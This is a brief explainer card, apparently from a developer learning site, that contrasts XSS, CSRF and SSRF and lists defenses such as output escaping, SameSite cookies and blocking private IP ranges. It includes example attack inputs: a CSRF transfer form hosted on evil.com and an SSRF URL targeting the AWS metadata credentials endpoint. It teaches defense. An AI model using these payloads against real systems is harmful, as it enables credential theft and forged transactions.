In revision.
Crisp5 min readGo deeper →

CSRF, XSS, SSRF

Three injection-style web vulns: XSS injects attacker JS into your page, CSRF tricks the user's browser into making requests, SSRF tricks your server into making requests.

Three classic web attacks. Different mechanism, different mitigation. People confuse them constantly.

XSS (Cross-Site Scripting): attacker gets JavaScript to run in another user's browser, on your origin. Once JS runs on your origin, it can read cookies (unless httpOnly), read localStorage, make any request as the user, exfiltrate data, install keyloggers. The most dangerous web vuln by impact. Three flavors: reflected (in URL params), stored (in DB, fed back to other users), DOM-based (client-side JS reads a sink).

CSRF (Cross-Site Request Forgery): attacker tricks the victim's browser into making a state-changing request to your site, using the victim's existing session cookie. Attacker hosts <form action="https://bank.com/transfer" method="POST"> on evil.com. Victim visits evil.com while logged into bank.com. Browser dutifully sends the cookie. Transfer happens.

SSRF (Server-Side Request Forgery): attacker tricks YOUR server into making an HTTP request to a URL the attacker controls or to internal resources. "Add image from URL" features are classic. Attacker enters http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS metadata endpoint), server fetches it, returns the response, attacker gets cloud credentials. Capital One breach (2019) was SSRF.

Three different trust boundaries getting violated.

Defenses, in order of effectiveness.

  • XSS: escape output by default (React does this), Content Security Policy header, httpOnly cookies. Never use dangerouslySetInnerHTML with user input. Validate uploads.
  • CSRF: SameSite=Lax cookies (browser default since 2020), CSRF tokens for state-changing requests, double-submit cookie pattern. Avoid GET endpoints that mutate state.
  • SSRF: whitelist the destination domains, block private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, 127.0.0.0/8), use IMDSv2 on AWS (requires session token, blocks naive SSRF), separate egress proxy with allow-list.

Order of impact in real breaches: XSS > SSRF > CSRF. XSS gives you the entire session. SSRF gives you cloud credentials. CSRF gives you one action at a time.

Learn more